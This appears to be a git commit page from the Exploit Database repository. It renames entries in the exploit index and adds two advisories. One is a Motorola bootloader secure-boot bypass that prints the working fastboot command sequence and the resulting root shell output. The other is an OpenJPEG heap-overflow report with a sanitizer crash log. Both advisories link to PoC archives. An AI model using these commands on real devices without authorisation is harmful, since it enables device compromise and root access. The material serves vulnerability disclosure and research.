DB: 2017-09-02
2 new exploits Mozilla Firefox 3.6.3 - Fork Bomb Denial of Service Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service) OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass Git <= 2.7.5 - Command Injection (Metasploit) Git < 2.7.5 - Command Injection (Metasploit) Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service Joomla! 1.0.7 / Mambo 4.5.3 - 'feed' Full Path Disclosure / Denial of Service Joomla! 1.0.9 - (Weblinks) Blind SQL Injection Joomla! 1.0.9 - 'Weblinks' Blind SQL Injection Joomla! 1.5.x - (Token) Remote Admin Change Password Joomla! 1.5.x - 'Token' Remote Admin Change Password Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion Joomla! Component & Plugin 'JE Tooltip' 1.0 - Local File Inclusion Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload Joomla! Component 'com_djClassifieds' 0.9.1 - Arbitrary File Upload Joomla! 1.6.0-Alpha2 - Cross-Site Scripting Joomla! 1.6.0 Alpha2 - Cross-Site Scripting Joomla! - Spam Mail Relay Joomla! 1.5.22 / 1.6.0 - 'com_mailto' Spam Mail Relay Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection Joomla! Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection
This commit is contained in:
parent
f94c5966a1
commit
a160bc0c68
4 changed files with 134 additions and 15 deletions
28
files.csv
28
files.csv
|
@ -1528,7 +1528,7 @@ id,file,description,date,author,platform,type,port
|
|||
12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0
|
||||
12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - 'JavaScriptCore.dll' Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0
|
||||
12491,platforms/multiple/dos/12491.html,"All browsers - Crash",2010-05-03,"Inj3ct0r Team",multiple,dos,0
|
||||
12492,platforms/windows/dos/12492.html,"Mozilla Firefox 3.6.3 - Fork Bomb Denial of Service",2010-05-03,Dr_IDE,windows,dos,0
|
||||
12492,platforms/windows/dos/12492.html,"Mozilla Firefox 3.6.3 - Fork Bomb (Denial of Service)",2010-05-03,Dr_IDE,windows,dos,0
|
||||
12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos,0
|
||||
12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash (PoC)",2010-05-03,R3d-D3V!L,windows,dos,0
|
||||
12508,platforms/osx/dos/12508.html,"Multiple browsers - 'history.go()' Denial of Service",2010-05-04,Dr_IDE,osx,dos,0
|
||||
|
@ -5664,6 +5664,7 @@ id,file,description,date,author,platform,type,port
|
|||
42495,platforms/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0
|
||||
42546,platforms/linux/dos/42546.txt,"libgig 4.0.0 (LinuxSampler) - Multiple Vulnerabilities",2017-08-23,qflb.wu,linux,dos,0
|
||||
42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0
|
||||
42600,platforms/linux/dos/42600.txt,"OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow",2017-09-01,"Ke Liu",linux,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -9221,6 +9222,7 @@ id,file,description,date,author,platform,type,port
|
|||
42567,platforms/windows/local/42567.py,"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
|
||||
42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
|
||||
42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0
|
||||
42601,platforms/android/local/42601.txt,"Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass",2017-09-01,"Roee Hay",android,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -15783,7 +15785,7 @@ id,file,description,date,author,platform,type,port
|
|||
42558,platforms/windows/remote/42558.py,"Disk Savvy Enterprise 9.9.14 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
|
||||
42559,platforms/windows/remote/42559.py,"Sync Breeze Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
|
||||
42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
|
||||
42599,platforms/python/remote/42599.rb,"Git <= 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
|
||||
42599,platforms/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -16780,7 +16782,7 @@ id,file,description,date,author,platform,type,port
|
|||
1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0
|
||||
1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0
|
||||
1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0
|
||||
1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - (feed) Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0
|
||||
1698,platforms/php/webapps/1698.php,"Joomla! 1.0.7 / Mambo 4.5.3 - 'feed' Full Path Disclosure / Denial of Service",2006-04-19,trueend5,php,webapps,0
|
||||
1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 < 1.1.3 - Remote File Inclusion",2006-04-19,"GroundZero Security",php,webapps,0
|
||||
1700,platforms/asp/webapps/1700.pl,"ASPSitem 1.83 - 'Haberler.asp' SQL Injection",2006-04-19,nukedx,asp,webapps,0
|
||||
1701,platforms/php/webapps/1701.php,"PHPSurveyor 0.995 - (surveyid) Remote Command Execution",2006-04-20,rgod,php,webapps,0
|
||||
|
@ -16935,7 +16937,7 @@ id,file,description,date,author,platform,type,port
|
|||
1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Parameter Remote File Inclusion",2006-06-16,K-159,php,webapps,0
|
||||
1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0
|
||||
1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0
|
||||
1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0
|
||||
1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - 'Weblinks' Blind SQL Injection",2006-06-17,rgod,php,webapps,0
|
||||
1923,platforms/php/webapps/1923.txt,"Ad Manager Pro 2.6 - 'ipath' Remote File Inclusion",2006-06-17,Basti,php,webapps,0
|
||||
1925,platforms/php/webapps/1925.txt,"Indexu 5.0.1 - (admin_template_path) Remote File Inclusion",2006-06-18,CrAsh_oVeR_rIdE,php,webapps,0
|
||||
1926,platforms/php/webapps/1926.txt,"PHP Live Helper 1.x - 'abs_path' Parameter Remote File Inclusion",2006-06-18,SnIpEr_SA,php,webapps,0
|
||||
|
@ -19943,7 +19945,7 @@ id,file,description,date,author,platform,type,port
|
|||
6231,platforms/php/webapps/6231.txt,"pPIM 1.0 - upload/change Password",2008-08-11,Stack,php,webapps,0
|
||||
6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - 'item' Parameter SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0
|
||||
6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 - 'mod' Parameter SQL Injection",2008-08-12,IP-Sh0k,php,webapps,0
|
||||
6234,platforms/php/webapps/6234.txt,"Joomla! 1.5.x - (Token) Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0
|
||||
6234,platforms/php/webapps/6234.txt,"Joomla! 1.5.x - 'Token' Remote Admin Change Password",2008-08-12,d3m0n,php,webapps,0
|
||||
6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 - 'img' Parameter Remote File Disclosure",2008-08-13,JIKO,php,webapps,0
|
||||
6247,platforms/php/webapps/6247.txt,"dotCMS 1.6 - 'id' Parameter Local File Inclusion",2008-08-15,Don,php,webapps,0
|
||||
6249,platforms/php/webapps/6249.txt,"Zeeways ZeeJobsite 2.0 - 'adid' Parameter SQL Injection",2008-08-15,"Hussin X",php,webapps,0
|
||||
|
@ -23288,7 +23290,7 @@ id,file,description,date,author,platform,type,port
|
|||
11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting",2010-03-19,Red-D3v1L,php,webapps,0
|
||||
11811,platforms/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System SQL Injection - (seite&aid) index.php Exploit",2010-03-19,"Easy Laster",php,webapps,0
|
||||
11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,php,webapps,0
|
||||
11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0
|
||||
11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin 'JE Tooltip' 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0
|
||||
11815,platforms/php/webapps/11815.txt,"Joomla! Component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0
|
||||
11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - (id_auk) auktion.php Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0
|
||||
11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download",2010-03-20,n01d,cgi,webapps,0
|
||||
|
@ -23708,13 +23710,13 @@ id,file,description,date,author,platform,type,port
|
|||
12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,cr4wl3r,php,webapps,0
|
||||
12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusion",2010-05-01,cr4wl3r,php,webapps,0
|
||||
12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,asp,webapps,0
|
||||
12479,platforms/php/webapps/12479.txt,"Joomla! 'com_djClassifieds' 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0
|
||||
12479,platforms/php/webapps/12479.txt,"Joomla! Component 'com_djClassifieds' 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0
|
||||
12481,platforms/php/webapps/12481.txt,"WHMCompleteSolution (WHMCS) Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0
|
||||
12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL Injection / XPath Injection",2010-05-02,indoushka,php,webapps,0
|
||||
12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,php,webapps,0
|
||||
12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-05-02,cr4wl3r,php,webapps,0
|
||||
12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Inclusion",2010-05-03,cr4wl3r,php,webapps,0
|
||||
12489,platforms/php/webapps/12489.txt,"Joomla! 1.6.0-Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,php,webapps,0
|
||||
12489,platforms/php/webapps/12489.txt,"Joomla! 1.6.0 Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,php,webapps,0
|
||||
14025,platforms/php/webapps/14025.txt,"2DayBiz Job Site Script - SQL Injection",2010-06-24,Sangteamtham,php,webapps,0
|
||||
12496,platforms/php/webapps/12496.html,"KubeBlog - Cross-Site Request Forgery",2010-05-03,The.Morpheus,php,webapps,0
|
||||
12499,platforms/php/webapps/12499.txt,"DBHcms 1.1.4 - Persistent Cross-Site Scripting",2010-05-04,ITSecTeam,php,webapps,0
|
||||
|
@ -25006,7 +25008,7 @@ id,file,description,date,author,platform,type,port
|
|||
15967,platforms/php/webapps/15967.txt,"energine 2.3.8 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0
|
||||
15971,platforms/php/webapps/15971.txt,"whCMS 0.115 - Cross-Site Request Forgery",2011-01-11,"High-Tech Bridge SA",php,webapps,0
|
||||
15981,platforms/php/webapps/15981.txt,"LifeType 1.2.10 - HTTP Referer Persistent Cross-Site Scripting",2011-01-12,"Saif El-Sherei",php,webapps,0
|
||||
15979,platforms/php/webapps/15979.txt,"Joomla! - Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0
|
||||
15979,platforms/php/webapps/15979.txt,"Joomla! 1.5.22 / 1.6.0 - 'com_mailto' Spam Mail Relay",2011-01-12,"Jeff Channell",php,webapps,0
|
||||
15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0
|
||||
16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0
|
||||
15989,platforms/php/webapps/15989.txt,"Joomla! Component People 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
|
||||
|
@ -38137,7 +38139,7 @@ id,file,description,date,author,platform,type,port
|
|||
41926,platforms/jsp/webapps/41926.txt,"Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection",2017-04-25,ERPScan,jsp,webapps,0
|
||||
41927,platforms/multiple/webapps/41927.txt,"HPE OpenCall Media Platform (OCMP) 4.3.2 - Cross-Site Scripting / Remote File Inclusion",2017-04-25,"Paolo Stagno",multiple,webapps,0
|
||||
41928,platforms/multiple/webapps/41928.py,"OpenText Documentum Content Server - dm_bp_transition.ebs docbase Method Arbitrary Code Execution",2017-04-25,"Andrey B. Panfilov",multiple,webapps,0
|
||||
41930,platforms/php/webapps/41930.txt,"Joomla Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
|
||||
41930,platforms/php/webapps/41930.txt,"Joomla! Component Myportfolio 3.0.2 - 'pid' Parameter SQL Injection",2017-04-24,"Persian Hack Team",php,webapps,0
|
||||
41936,platforms/php/webapps/41936.txt,"October CMS 1.0.412 - Multiple Vulnerabilities",2017-04-25,"Anti Räis",php,webapps,80
|
||||
41939,platforms/php/webapps/41939.txt,"Revive Ad Server 4.0.1 - Cross-Site Scripting / Cross-Site Request Forgery",2017-04-26,"Cyril Vallicari",php,webapps,0
|
||||
41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80
|
||||
|
@ -38379,6 +38381,6 @@ id,file,description,date,author,platform,type,port
|
|||
42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0
|
||||
42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0
|
||||
42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0
|
||||
42596,platforms/php/webapps/42596.txt,"Joomla Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42597,platforms/php/webapps/42597.txt,"Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42598,platforms/php/webapps/42598.txt,"Joomla Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42596,platforms/php/webapps/42596.txt,"Joomla! Component Huge-IT Video Gallery 1.0.9 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
31
platforms/android/local/42601.txt
Executable file
31
platforms/android/local/42601.txt
Executable file
|
@ -0,0 +1,31 @@
|
|||
Sources:
|
||||
https://alephsecurity.com/2017/08/30/untethered-initroot/
|
||||
https://github.com/alephsecurity/initroot
|
||||
|
||||
initroot: Motorola Bootloader Kernel Cmdline Injection Secure Boot & Device Locking Bypass (CVE-2016-10277)
|
||||
|
||||
By Roee Hay / Aleph Research, HCL Technologies
|
||||
|
||||
Recap of the Vulnerability and the Tethered-jailbreak
|
||||
|
||||
1. Vulnerable versions of the Motorola Android Bootloader (ABOOT) allow for kernel command-line injection.
|
||||
2. Using a proprietary fastboot OEM command, only available in the Motorola ABOOT, we can inject, through USB, a parameter named initrd which allows us to force the Linux kernel to populate initramfs into rootfs from a specified physical address.
|
||||
3. We can abuse the ABOOT download functionality in order to place our own malicious initramfs at a known physical address, named SCRATCH_ADDR (see here for a list of devices).
|
||||
4. Exploiting the vulnerability allows the adversary to gain unconfined root shell.
|
||||
5. Since the initramfs payload is injected into RAM by the adversary, the vulnerability must be re-exploited on every reboot.
|
||||
For example, here is a successful run of the exploit on cedric (Moto G5)
|
||||
|
||||
$ fastboot oem config fsg-id "a initrd=0xA2100000,1588598"
|
||||
$ fastboot flash aleph initroot-cedric.cpio.gz
|
||||
$ fastboot continue
|
||||
|
||||
$ adb shell
|
||||
cedric:/ # id
|
||||
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3014(readproc) context=u:r:kernel:s0
|
||||
cedric:/ # getenforce
|
||||
Permissive
|
||||
cedric:/ #
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42601.zip
|
86
platforms/linux/dos/42600.txt
Executable file
86
platforms/linux/dos/42600.txt
Executable file
|
@ -0,0 +1,86 @@
|
|||
DESCRIPTION
|
||||
|
||||
An Out-of-Bounds Write issue can be occurred in function opj_mqc_byteout of mqc.c during executing opj_compress. This issue was caused by a malformed BMP file.
|
||||
|
||||
CREDIT
|
||||
|
||||
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.
|
||||
|
||||
TESTED VERSION
|
||||
|
||||
Master version of OpenJPEG (805972f, 2016/09/12)
|
||||
|
||||
EXCEPTION LOG
|
||||
|
||||
==119535==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eeb5
|
||||
at pc 0x7f1b2f0154c2 bp 0x7ffec8559cc0 sp 0x7ffec8559cb8
|
||||
WRITE of size 1 at 0x60200000eeb5 thread T0
|
||||
#0 0x7f1b2f0154c1 in opj_mqc_byteout openjpeg-master/src/lib/openjp2/mqc.c:221:13
|
||||
#1 0x7f1b2f014bec in opj_mqc_flush openjpeg-master/src/lib/openjp2/mqc.c:421:2
|
||||
#2 0x7f1b2f042190 in opj_t1_encode_cblk openjpeg-master/src/lib/openjp2/t1.c:1685:3
|
||||
#3 0x7f1b2f040929 in opj_t1_encode_cblks openjpeg-master/src/lib/openjp2/t1.c:1539:7
|
||||
#4 0x7f1b2f06950d in opj_tcd_t1_encode openjpeg-master/src/lib/openjp2/tcd.c:2052:15
|
||||
#5 0x7f1b2f067b66 in opj_tcd_encode_tile openjpeg-master/src/lib/openjp2/tcd.c:1240:23
|
||||
#6 0x7f1b2efecc4f in opj_j2k_write_sod openjpeg-master/src/lib/openjp2/j2k.c:4358:15
|
||||
#7 0x7f1b2efea900 in opj_j2k_write_first_tile_part openjpeg-master/src/lib/openjp2/j2k.c:10659:15
|
||||
#8 0x7f1b2efc6d65 in opj_j2k_post_write_tile openjpeg-master/src/lib/openjp2/j2k.c:10448:15
|
||||
#9 0x7f1b2efc52c7 in opj_j2k_encode openjpeg-master/src/lib/openjp2/j2k.c:10199:23
|
||||
#10 0x7f1b2f00367c in opj_jp2_encode openjpeg-master/src/lib/openjp2/jp2.c:1955:9
|
||||
#11 0x7f1b2f01b304 in opj_encode openjpeg-master/src/lib/openjp2/openjpeg.c:737:11
|
||||
#12 0x4edc7d in main openjpeg-master/src/bin/jp2/opj_compress.c:1877:36
|
||||
#13 0x7f1b2d77682f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
|
||||
#14 0x41a898 in _start (openjpeg-master/bin/opj_compress+0x41a898)
|
||||
|
||||
0x60200000eeb5 is located 0 bytes to the right of 5-byte region [0x60200000eeb0,0x60200000eeb5)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4ba9c8 in malloc (openjpeg-master/bin/opj_compress+0x4ba9c8)
|
||||
#1 0x7f1b2f07369c in opj_malloc openjpeg-master/src/lib/openjp2/opj_malloc.c:195:10
|
||||
#2 0x7f1b2f06ed5f in opj_tcd_code_block_enc_allocate_data openjpeg-master/src/lib/openjp2/tcd.c:1097:36
|
||||
#3 0x7f1b2f0664b0 in opj_tcd_init_tile openjpeg-master/src/lib/openjp2/tcd.c:1023:14
|
||||
#4 0x7f1b2f0604e6 in opj_tcd_init_encode_tile openjpeg-master/src/lib/openjp2/tcd.c:1055:9
|
||||
#5 0x7f1b2efc57d3 in opj_j2k_pre_write_tile openjpeg-master/src/lib/openjp2/j2k.c:10300:15
|
||||
#6 0x7f1b2efc4d8d in opj_j2k_encode openjpeg-master/src/lib/openjp2/j2k.c:10146:23
|
||||
#7 0x7f1b2f00367c in opj_jp2_encode openjpeg-master/src/lib/openjp2/jp2.c:1955:9
|
||||
#8 0x7f1b2f01b304 in opj_encode openjpeg-master/src/lib/openjp2/openjpeg.c:737:11
|
||||
#9 0x4edc7d in main openjpeg-master/src/bin/jp2/opj_compress.c:1877:36
|
||||
#10 0x7f1b2d77682f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow openjpeg-master/src/lib/openjp2/mqc.c:221:13 in opj_mqc_byteout
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c047fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa 05 fa
|
||||
0x0c047fff9da0: fa fa 00 01 fa fa 05 fa fa fa 00 01 fa fa 05 fa
|
||||
0x0c047fff9db0: fa fa 00 01 fa fa 05 fa fa fa 00 01 fa fa 05 fa
|
||||
0x0c047fff9dc0: fa fa 00 01 fa fa 05 fa fa fa 00 01 fa fa 05 fa
|
||||
=>0x0c047fff9dd0: fa fa 00 01 fa fa[05]fa fa fa 00 01 fa fa 00 fa
|
||||
0x0c047fff9de0: fa fa fd fd fa fa fd fd fa fa 00 00 fa fa 04 fa
|
||||
0x0c047fff9df0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
|
||||
0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
Container overflow: fc
|
||||
Array cookie: ac
|
||||
Intra object redzone: bb
|
||||
ASan internal: fe
|
||||
Left alloca redzone: ca
|
||||
Right alloca redzone: cb
|
||||
==119535==ABORTING
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42600.zip
|
|
@ -18,7 +18,7 @@ echo'<html>
|
|||
|
||||
<body bgcolor="#FFCCFF">
|
||||
|
||||
<p align="center"><font size="4" color="#0000FF">Mambo/Joomla Path Disclosure &
|
||||
<p align="center"><font size="4" color="#0000FF">Mambo/Joomla Path Disclosure &
|
||||
(IIS Server-isapi mod) Remote Denial Of Service</font></p>
|
||||
<p class="Stile6" align="center"><font size="3" color="#FF0000">by trueend5</font></p>
|
||||
<p align="center"><font size="4" color="#008000">Computer Security Science Researchers
|
||||
|
@ -37,7 +37,7 @@ Institute</font></p>
|
|||
/mambo/
|
||||
or just / )</span></p>
|
||||
<p><input name="pref" size="20"> <span class="Stile5">prefix (default is
|
||||
"kap")</span></p>
|
||||
"kap")</span></p>
|
||||
<p> useful when you want to Run this script
|
||||
twice or more at the same time against a target For DDOS.</p>
|
||||
<p> to perform it Just rename this file and choose a different
|
||||
|
|
Loading…
Add table
Reference in a new issue